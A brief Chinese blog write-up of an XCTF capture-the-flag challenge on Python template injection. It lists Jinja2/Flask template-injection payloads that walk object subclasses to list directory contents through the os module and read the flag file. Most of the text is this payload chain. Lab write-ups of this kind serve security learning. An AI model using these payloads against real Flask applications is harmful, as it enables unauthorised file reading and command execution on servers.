2020.3.31 xctf(Web_python_template_injection)①

在这里插入图片描述根据题意可知python模块注入

测试payload:http://111.198.29.45:31069/{{3+4}}
在这里插入图片描述执行了{{}}中的代码。

{{''.__class__.__mro__[2].__subclasses__()}}

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

在这里插入图片描述从零学flask模板注入

发布了48 篇原创文章 · 获赞 3 · 访问量 3369

猜你喜欢

转载自blog.csdn.net/DSR446/article/details/105230770